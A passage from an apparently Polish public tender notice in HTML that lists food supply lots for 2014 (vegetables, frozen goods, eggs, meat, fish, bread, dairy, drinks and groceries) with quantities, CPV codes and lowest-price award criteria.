marchew myta	kg	150
ogórek świeży	kg	30
papryka świeża	kg	13
pietruszka korzeń	kg	5
pomidor	kg	40
por 	kg	50
rzodkiewka pęczki	szt	25
sałata	szt	120
sałata dekoracyjna	szt	5
sałata lodowa	szt	5
seler	kg	80
szczypiorek	szt	20
zielenina natka	szt	80
ziemniaki 	kg	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cebulka konserwowa 300g	szt	5
chrzan tarty słoik 180-220 g	szt	3
chrzan z żurawiną 180-220 g	szt	3
fasolka czerwona konserwowa 400-450g	szt	5
groszek konserwowy 400g	szt	50
groszek z marchewką 0,9l	szt	5
kapusta kiszona 	kg	80
koncentrat pomidorowy 0,9l	szt	40
kukurydza konserwowa 400-450g	szt	15
ogórki kiszone	kg	80
ogórki konserwowe 0,9l	szt	50
ogórki małosolne	kg	20
oliwki czarne 200ml	szt	2
oliwki zielone 200ml	szt	2
papryka konserwowa 0,9l	szt	15
pieczarka	kg	40
pieczarka konserwowa 0,9l	szt	10
seler w słoiku 0,250	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły mroż. 2,5 kg	szt	5
brukselka mroż 0.5 kg	szt	3
Frytki 2 kg	szt	7
marchew z groszkiem 2,5 kg	szt	2
szpinak 1kg	szt	10
truskawki mrozone	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	5
boczek świeży	kg	10
boczek wędzony surowy	kg	40
ćwiartki tylne drobiowe	kg	30
filet królewski z indyka	kg	10
filet z piersi kurczaka	kg	120
flaki wołowe 1 kg	szt	7
golonka wieprz b/k	kg	5
kabanosy 	kg	5
karkówka wieprz b/k 	kg	80
kiełbasa  krakowska  lub równoważna	kg	8
kiełbasa  krakowska parzona  lub równoważne	kg	8
kiełbasa  mysliwska  lub równoważna	kg	13
kiełbasa biała  surowa	kg	40
kiełbasa szynkowa	kg	25
kiełbasa śląska  lub równoważna	kg	50
kiełbasa toruńska  lub równoważna	kg	60
kiełbasa z weka  lub równoważna	kg	7
kiełbasa zywiecka lub równoważna	kg	20
korpusy drobiowe(grzbiety)	kg	120
kości wieprzowe	kg	30
królewiecka  lub równoważna	kg	10
kurczak świeży	kg	15
łopatka b/k	kg	150
martadela	kg	20
metka inna  wiejska  lub równoważna	kg	5
metka łososiowa 	kg	5
mielonka konserwowa	kg	10
mięso gulaszowe	kg	20
ogonówka 	kg	10
parówka w folii	kg	10
parówka wiedenska  lub równoważna	kg	10
pasztetowa  domowa	kg	5
polędwica drobiowa	kg	7
polędwica sopocka   lub równoważne	kg	10
polędwica szkolna  lub równoważna	kg	5
przysmak śniadaniowy 130g	szt	10
schab wiep b/k	kg	80
serdelki	kg	40
szynka konserwowa 	kg	5
szynka mielona	kg	3
szynka wiep b/k	kg	50
turystyczna  lub równoważna 250-380g	szt	15
tyrolska  lub równoważna	kg	10
udka	kg	80
wątroba drobiowa	kg	25
wątroba wieprzowa	kg	25
wołowina zrazowa	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	7
karp	kg	15
łosoś filet	kg	5
łosoś wędzony	kg	5
makrela wędzona	kg	5
matijas	kg	35
panga	kg	60
paprykarz 156g	szt	10
pstrąg świe.	kg	3
szprot w pomidorach 150- 250	szt	10
śledź w pomidorach 150-250	szt	10
tuńczyk  w sosie wł. 250G	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 -pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka tarta	kg	60
bułki 50g	szt	500
chleb forma 0.5	szt	20
chleb krojony0,6kg	szt	500
chleb razowy 0,5	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza gryczana 1kg	szt	3
kasza jęczm. średnia	kg	35
kasza manna	kg	3
mąka krupczatka	kg	10
mąka pszenna typu 450	kg	100
mąka pszenna typu 500	kg	100
mąka ziemiaczna	kg	20
płatki kukur. 500 g	szt	10
płatki kukur.kakaowe 500g	szt	10
ryż 1kg	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 -produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> barszcz czerwony 220ml-koncentrat	szt	40
bialy barszcz 60g	szt	25
budyń 60-75g	szt	30
ciastka kruche	kg	20
ciastka typu wafelki	kg	20
ciastka typy pierniki	kg	15
ciastka w polewie	kg	10
cukier	kg	200
cukier puder  0,5 kg	szt	30
cukier waniliowy 15-20g	szt	50
cukierki czekoladowe	kg	5
cukierki krówki	kg	3
cynamon 0,20g	szt	15
czekolada pełnomleczna 100g	szt	10
czipsy 100-130g	szt	10
galaretka owocowa 70-90g	szt	60
hebata expres owocowa 25szt	szt	8
herbata 100szt  lub równoważna	szt	4
herbata expres 100 szt	szt	15
herbata expres 50 szt	szt	15
jarzynka 200g	szt	15
kakao  rozpuszczalne 500g	szt	10
kakao naturalne 200 g	szt	10
kawa naturalna mielona 500ml	szt	50
kawa rozpuszczalna 200g  lub równoważna	szt	22
kawa rozpuszczalna zboż 200g	szt	4
keczup 500g 	szt	20
kisiel 35-50g	szt	20
kminek 20g	szt	10
krem czekoladowy 200g	szt	20
krem czekoladowy 400g	szt	10
kwasek cytrynowy 15-20g	szt	40
liść laurowy 12g	szt	25
lizak serduszko 12-20g	szt	0
magi w plynie 1 l	szt	20
majeranek 20g	szt	25
majonez  sałatkowy 700g	szt	13
majonez sałatkowy 400g	szt	20
makaron gniazda 1kg 	szt	25
makaron muszle duże  1kg	szt	10
makaron nitki  0.5 kg	szt	30
makaron spagetti 0,5kg	szt	45
makaron świderki 1kg	szt	20
musztarda 165-190g	szt	30
paluszki solone 0,400g	szt	20
paluszki z sezamem 70g	szt	10
papryka mielona 20g	szt	20
pasztet wielkopolski 131g lub równoważny	szt	10
pieprz mielony 20g	szt	120
pieprz ziolowy 20g	szt	20
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	5
proszek do pieczenia 25-30 g	szt	40
przyprawa do kurczaka 20 g	szt	30
przyprawa gyros 30g	szt	7
przyprawa piernikowa 25-30g	szt	10
rosół drobiowy kost. 60-120g	szt	15
sos do spagetti fix 250	szt	60
sos słodko-kwaśny 0,9l	szt	5
sól	kg	60
vegeta 200g	szt	45
wafelek b/polewy 35-50g	szt	50
wafelek grześ w polewie 35-50g	opk	3
wafelek w polewie 50g	szt	50
wiórki kokosowe 200 g	szt	50
zelatyna 50g	szt	15
ziele angielskie 60g	szt	25
zupki chińska (ostra,łagodna rosołowa itp.) 70g	szt	50
zurek w proszku 60-90g	szt	45
żurek w butelce 350-500g	szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem lub równoważna 0,5 kg	szt	40
margaryna 250 g	szt	200
masło roślinne 200g	szt	10
olej 1l	szt	80
olej 3l	szt	10
smalec 200g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jogurt  150g 	szt	80
jogurt  150g naturalny	szt	40
jogurt pitny 100-150g	szt	50
lody 1000g	szt	15
Lody-rolada 850g	szt	5
masło śmietank. 200G	szt	120
Mleko UHT 2% 1l	szt	10
Mleko UHT 3,2% 1l	szt	130
ser feta 180-250g	szt	7
ser salami	kg	10
ser top. krążek  100g	szt	20
ser twarogowy 200g	szt	60
ser twarogowy półtusty	kg	60
ser wędzony	kg	5
ser żółty  edamski	kg	8
ser żółty  królewski	kg	6
ser żółty  morski	kg	10
ser żółty  szwajcar	kg	5
serek homogenizowany 125-150g	szt	20
serek kanapk. Twarożk. 150g	szt	50
serek twaroż.  almette  lub równoważny 120-220g	szt	30
set topiony 100g	kg	15
Śmietana 12% UHT 0,5 l.	szt	25
Śmietana 18% 0,4 zakw.	szt	50
Śmietana 30%  0,2 l	szt	30
śmietana w spray 0,5	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda mineral. 0,5 gaz	szt	200
woda mineral. n/g 1,5 l	szt	200
Woda mineralna 0,5 n/g	szt	200
Woda mineralna g 1,5 l 	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas owoc	szt	5
arbuz	kg	30
banany	kg	40
brzoskwinie	kg	15
cytryny	kg	10
gruszki	kg	5
jabłka	kg	60
kiwi	kg	4
maliny	kg	2
mandarynki	kg	20
nektaryny	kg	15
pomarancza	kg	20
rabarbar	kg	2
truskawki	kg	2
winogrona ciemne	kg	20
winogrona jasne	kg	20
wisnie	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany puszka 400-450	szt	30
brzoskwinia konserwowa puszka 900ml	szt	30
Dżem  słoik 220 -260 	szt	30
kompot owocowy 0,9 l	szt	4
marmolada owocowa 600g	szt	10
rodzynki suszone 0.5 kg	szt	2
rodzynki suszone 100g	szt	15
sok owocowy 1l karton	szt	10
sok owocowy 2l karton	szt	5
syrop owocowy 1l 	szt	5
syrop owocowy 0,5l 	szt	36
sok warzywno-owocowy (różne smaki marchew-banan-jabłko itp.) 300ml	szt	40
śliwki suszone 250g	szt	5
żurawina 220 -260	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bób	kg	5
brokuł	szt	5
burak	kg	80
cebula	kg	100
cebula czerwona 	kg	5
czosnek	kg	10
fasola drobna 0,5 kg	szt	10
fasola jaś	kg	10
fasola jaś 0,5kg	szt	10
fasola szparagowa	kg	5
groch łuska	kg	10
kalafior	szt	10
kapusta 	kg	60
kapusta czerwona	kg	15
kapusta młoda 	szt	50
kapusta pekińska	szt	50
koper	szt	50
marchew myta	kg	150
ogórek świeży	kg	50
papryka świeża	kg	15
pietruszka korzeń	kg	5
pomidor	kg	60
por 	kg	25
rzodkiewka pęczki	szt	50
sałata	szt	50
sałata dekoracyjna	szt	30
sałata lodowa	szt	10
seler	kg	30
szczypiorek	szt	10
zielenina natka	szt	60
ziemniaki 	kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cebulka konserwowa 300g	szt	5
chrzan tarty słoik 180-220	szt	24
chrzan z żurawiną 180-220	szt	2
fasolka czerwona konserwowa 400-460	szt	5
groszek konserwowy 400g	szt	25
groszek z marchewką 0,9l	szt	2
kapusta kiszona 	kg	30
koncentrat pomidorowy 0,9l	szt	15
kukurydza konserwowa 400-450	szt	25
ogórki kiszone	kg	15
ogórki konserwowe 0,9l	szt	20
ogórki małosolne	kg	15
oliwki czarne 200 ml	szt	5
oliwki zielone 200ml	szt	5
papryka konserwowa 0,9l	szt	15
pieczarka	kg	20
pieczarka konserwowa 0,9l	szt	10
seler w słoiku 200-250	szt	10
szczaw konserwowy 0,9	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż	kg	2
brokuły mroż. 	kg	1
fasolka szparagowa	kg	3
frytki 	kg	5
groszek mrozony	kg	1
kalafior mroż	kg	3
marchew mini 	kg	2
marchew kostka 	kg	6
marchew z groszkiem 400-450	szt	1
mieszanka kompotowa	kg	1
pizza mała 250-300	szt	20
pyzy z mięsem  	kg	4
szpinak	kg	2
truskawki mrozone	kg	1
warzywa na patelnię	kg	2
warzywa na pat.chinskie	kg	2
zapiekanka 200-250	szt	20
zupa wiosenna	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	750.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	3
flaki wieprzowe	kg	2
flaki wołowe	kg	2
golonka wieprz b/k	kg	3
golonka wiep z kością	kg	3
karkówka wieprz b/k	kg	20
karkówka wieprz z/k	kg	5
kości wieprzowe	kg	15
łopatka b/k	kg	65
łopatka z kością	kg	4
mięso gulaszowe	kg	4
ozory wieprzowe	kg	3
polędwica wieprzowa (Mięso)	kg	2
rozbeft wołowy	kg	1
schab wiep b/k	kg	12
schab wiep z/k	kg	3
słonina	kg	2
szynka wiep b/k	kg	6
wątroba wieprzowa	kg	5
wołowina gulaszowa	kg	2
wołowina zrazowa	kg	2
żeberka wiep	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22 - drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ćwiartki tylne drobiowe	kg	10
filet drobiowy	kg	10
filet z piersi kurczaka	kg	50
korpusy drobiowe(grzbiety)	kg	150
kurczak świe.	kg	10
serca drobiowe	kg	5
skrzydełka z kurczaka	kg	6
udka	kg	200
wątroba drobiowa	kg	5
żołądki drobiowe	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23 - wędliny i prod. wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	5
boczek wędzony gotowany	kg	2
boczek wędzony surowy	kg	1
boczek rolada	kg	2
kabanosy leśne  lub równoważne	kg	3
kiełbasa biała parzona	kg	3
kiełbasa biała  surowa	kg	3
kiełbasa codzienna  lub równoważna	kg	9
kiełbasa golonkowa	kg	6
kiełbasa śląska  lub równoważna	kg	5
kiełbasa toruńska  lub równoważna	kg	5
kiełbasa typu mysliwska  lub równoważna	kg	5
kiełbasa typu ogniskowa  lub równoważna	kg	5
kiełbasda piwna	kg	5
kiełbasa szynkowa	kg	5
kiełbasa zwyczajna	kg	5
kiełbasa z weka  lub równoważna	kg	5
kiełbasa typu krakowska  lub	kg	5
kiełbasa typu krakowska parzona  lub równoważne	kg	5
kiełbasa typu zywiecka lub równoważna	kg	5
królewiecka  lub równoważna	kg	5
metka cebulowa 200g	szt	5
metka łososiowa	kg	3
metka inna typu wiejska  lub równoważna	kg	6
mielonka wędlina	kg	4
mielonk a z warzywami	kg	5
mortadela	kg	1
ogonówka	kg	5
parówka drobiowa	kg	3
parówka w folii	kg	5
parówka wieprzowa	kg	9
pasztetowa  	kg	3
pasztetowa  śmietankowa  lub równoważne	kg	3
pasztet drobiowy	kg	3
pierś z kurczaka wędlina	kg	5
polędwica drobiowa	kg	6
polędwica drobiowa lux	kg	5
polędwica sopocka drobiowa  lub równoważne	kg	5
polędwica indyk	kg	5
polędwica wieprz.(wędlina)	kg	5
przysmak w konserwie	kg	3
przysmak śniadaniowy	kg	5
salami	kg	4
salceson biały typu włoski  lub równoważny	kg	2
salceson czarny ozorkowy	kg	2
serdelki	kg	4
smaczek konserwowy	kg	5
szynka drobiowa	kg	5
szynka mielona	kg	4
szynka konserwowa	kg	4
szynkowa	kg	5
szynka typu szynka żołniers  lub równoważna	kg	6
szynka z warzywami	kg	5
szynkówka kiełbasa	kg	5
tyrolska  lub równoważna	kg	5
wędlina z warzywami	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24 - pasztety i konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> gulasz angielski 120g	szt	24
pasztet131 g koperek/majer./papryka/pieczar/pomid	szt	24
przysmak śniadaniowy 130g	szt	24
przysmak śniadaniowy 300g	szt	12
turystyczna  135g	szt	24
turystyczna 300g	szt	12
tyrolska 135g	szt	24
tyrolska 300g	szt	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25 - ryby i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z mintaja	kg	3
łosoś sałatkowy 200g	szt	2
matijas	kg	5
makrela wędzona	kg	1
paluszki rybne	kg	2
panga	kg	6
paprykarz 156g	szt	5
pstrąg świe.	kg	1
szprot w pomidorach 175g	szt	3
śledż św. Filet	kg	3
śledź w pomidorach 175g	szt	5
tuńczyk  w sosie wł. 170G	szt	2
tunczyk w oleju 170g	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26- pieczywo i ciasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony 0,6kg	szt	550
chleb forma 0.5	szt	60
chleb forma 1kg	szt	3
chleb słonecznikowy 0,5	szt	20
chleb  Z ZIARNAMI 0.5	szt	5
chleb razowy 0,5	szt	5
chleb wiejski 1kg	szt	5
ciastka drożdżowe 100g	szt	90
ciasta różne	kg	4
bułki 100g	szt	200
bułki 50g	szt	500
bułki hamburger 100G	szt	60
rogal 100g	szt	90
pączki 70g	szt	90
ciastka francuskie 60G	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27 - produkty skrobi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	5
kasza gryczana 4x100g	szt	2
kasza gryczana 1kg	szt	2
kasza jęczm. drobna	kg	2
kasza jęczm. Średnia	kg	3
kasza jęczm. Średnia 5kg	szt	1
kasza pęczak	kg	3
mąka krupczatka	kg	3
mąka pszenna typu 500	kg	10
mąka pszenna typu 450	kg	20
mąka ziemiaczna	kg	5
płatki owsiane 	kg	3
płatki kukurydz. 250G	szt	5
platki kukur. 500 g	szt	5
platki kuku.kakaowe 250g	szt	5
platki kukur.kulki 500g	szt	10
płatki typu  chocapic 250-300	szt	8
płatki 500g typu kangus	szt	8
ryż 1kg typu uncle bens	szt	3
ryż w woreczkach 0,4kg	szt	3
ryż 1kg	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie nr 28 - produkty spożywcze różne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton   55-90g	szt	30
baton 60-90g	szt	30
bato typu lion 65-95 g	szt	30
baton typu snikers 65-95 g	szt	30
barszcz czerwony 220ml	szt	19
bialy barszcz 60-90 g	szt	18
budyń 60-75	szt	30
ciastka w polewie	kg	24
ciastka kruche	kg	24
ciastka typy pierniki	kg	4
ciastka typu wafelki	kg	24
Ciastka-rolada  300g	szt	7
cukier	kg	60
cukier puder  0,4 kg	szt	3
cukier waniliowy 15-20 g	szt	20
cukier kostka	kg	1
cukierki czekoladowe	kg	4
cukierki typu krówki	kg	4
cukierki typu szklaki	kg	4
cukierki owocowe	kg	4
cynamon 0,20g	szt	8
czekolada z orzechami 100 g	szt	30
czekolada nadziewana 100 g	szt	30
czipsy 100 - 130 g	szt	30
draże mleczne 100 g	szt	30
drożdże 100g	szt	10
galaretka owocowa 70-90g	szt	27
herbata expres 100 szt	szt	10
herbata expr. Mietowa 20szt	szt	1
hebata expres owocowa 25szt	szt	20
herbata granulowana 100g	szt	2
herbata owoc.rozpusz gran. 100 g	szt	3
herbata 100szt  150g (100 x 1,5g)	szt	4
herbata 50 szt (50 x 1,5g)	szt	2
herbata zielona expre25szt	szt	2
jarzynka 200g	szt	5
jarzynka 1kg	szt	6
Jarzynka 0,5 kg	szt	3
Kawa zboż-expr. 35 szt	szt	5
kawa rozpuszczalna zboż 200g	szt	7
kawa rozpusz. 200g  	szt	3
kawa rozpuszcz. 100g   	szt	5
kawa - napój kawowy wanilia, z magnezem, czekoladowe itp. 110-125g	szt	2
kawa naturalna mielona 220/250g	szt	2
kawa naturalna mielona 500g	szt	30
kawa typu 220/ 250g 	szt	6
kawa typu  450/500g  	szt	4
kakao rozpuszczalne 300g	szt	40
kakao naturalne 250-300g	szt	5
keczup 500g	szt	17
keczup pikantny 0.5	szt	8
Keczup 1 l	szt	3
kisiel 35-50 g	szt	22
kisiel expr typu słodka chwila  lub równoważny 30-35g	szt	30
kminek 20g	szt	5
kotlety sojowe 100g	szt	5
kotlety sojowe 420/500g	szt	3
krem czekoladowy 200/250gg	szt	67
krem czekoladowy 400g	szt	5
krem czekolad.orzechowy 200-350g	szt	10
kurkuma 18-20g	szt	5
kwasek cytrynowy 15-20g	szt	15
kwasek cytrynowy 0,5kg	szt	1
liść laurowy 12/20g	szt	8
lizak typu chupa-chups  lub równoważny 15g	szt	30
lizak 12-15g	szt	30
lizak typu serduszko 12-20g	szt	30
magi w plynie 1 l	szt	5
mak -puszka 500g	szt	2
